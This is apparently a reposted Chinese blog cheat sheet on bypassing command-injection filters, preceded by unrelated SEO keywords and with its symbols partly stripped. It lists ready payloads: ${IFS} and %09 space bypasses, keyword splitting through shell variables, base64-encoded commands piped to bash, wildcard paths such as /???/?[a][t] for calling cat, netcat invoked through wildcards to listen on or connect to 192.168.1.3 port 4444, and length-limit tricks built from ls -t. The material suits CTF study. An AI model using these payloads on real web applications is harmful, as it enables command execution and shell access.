洛阳市app网站开发公司电话,做购实惠网站的意义,泰安二手房,wordpress 百度地图api前言命令注入是web中常见的漏洞之一#xff0c;由于web应用程序未对用户提交的数据做严格的过滤#xff0c;导致用户输入可以直接被linux或windows系统当成命令执行#xff0c;一般都会造成严重的危害。常用符号分号(;)多条语句顺序执行时的分割符号。1cmd1;cmd2管道符(|)cm… 前言命令注入是web中常见的漏洞之一由于web应用程序未对用户提交的数据做严格的过滤导致用户输入可以直接被linux或windows系统当成命令执行一般都会造成严重的危害。常用符号分号(;)多条语句顺序执行时的分割符号。1cmd1;cmd2管道符(|)cmd1命令的输出作为下一条命令cmd2的参数。1cmd1|cmd2and()与命令cmd1成功则执行cmd2cmd1失败则不执行cmd21cmd1 cmd2or(||)或命令cmd1失败则执行cmd2cmd1成功则不执行cmd21cmd1 || cmd2反引号()和$()反引号和$()都可用来表示命令被这两种方式包含的字符串都会被当做命令首先执行。12echo result : whoamiecho result : $(whoami)绕过方式总结空格绕过在过滤了空格的系统中以cat flag.txt为例系统不允许我们输入空格或输入后被过滤。${IFS}可使用${IFS}代替空格。123cat${IFS}flag.txtcat$IFS$1flag.txtcat${IFS}$1flag.txt重定向符绕过()12catflag.txtcat%09(需要php环境)php环境下web输入%09等效于空格1cat%09flag.txt黑名单绕过拼接使用shell变量拼接被黑名单限制的关键词1ac;bat;cfl;dag;e.txt;$a$b $c$d$e;base64使用反引号包含base64解码后的命令1echo Y2F0IGZsYWcudHh0Cg | base64 -d将base64解码后的命令通过管道符传递给bash1echo Y2F0IGZsYWcudHh0Cg | base64 -d | bash单引号双引号1cat flag.txt反斜杠1c\at fl\a\g.tx\t$11ca$1t fl$1ag.t$1xt读文件绕过123456789101112(1)more:一页一页的显示档案内容(2)less:与 more 类似但是比 more 更好的是他可以[pg dn][pg up]翻页(3)head:查看头几行(4)tac:从最后一行开始显示可以看出 tac 是 cat 的反向显示(5)tail:查看尾几行(6)nl显示的时候顺便输出行号(7)od:以二进制的方式读取档案内容(8)vi:一种编辑器这个也可以查看(9)vim:一种编辑器这个也可以查看(10)sort:可以查看(11)uniq:可以查看(12)file -f:报错出具体内容通配符绕过/???会去寻找 / 目录下的三个字符长度的文件正常情况下会寻找到/bin然后/?[a][t]会优先匹配到/bin/cat,就成功调用了cat命令然后后面可以使用正常的通配符匹配所需读的文件如flag.txt文件名长度为8使用8个?’’此命令就会读取所有长度为8的文件。1/???/?[a][t] ????????同理我们也可以匹配/bin下的其他命令如morelessvitail等命令来查看文件或者执行其他命令。1/???/[m][o]?[e] ????????1/???/[t]?[i][l] ????????甚至开启一个shell1/???/[n]?[t]??[t] -lvp 44441/???/[n]?[t]??[t] 192.168.1.3 4444命令嵌套1echo result:whoami1echo result:$(uname -a)长度绕过使用绕过长度限制使用每次添加一部分命令到文件中1234echo -n cmd1 r;echo -n cmd2 r;echo -n cmd3 r;echo cmd4 r;然后使用cat r | bash执行命令使用换行执行和ls -t绕过长度限制linux中文件中的命令如果需要换行书写需要在前一行末尾增加\如文件a中有123ca\t flag.t\xt使用sh a即可执行命令cat flag.txtls -t可根据时间创建顺序逆序输出文件名a可以创建一个名为a的文件按照这个思路可以使用1234 ag fl\\ t \\ ca\\然后使用ls -t ss中文件内容就是123456sca\t \fl\ag\其他的无关内容之后使用sh s即可执行cat flag作者Leticia来源Leticias Blog扫描关注乌云安全觉得不错点个“赞”、“在看”哦
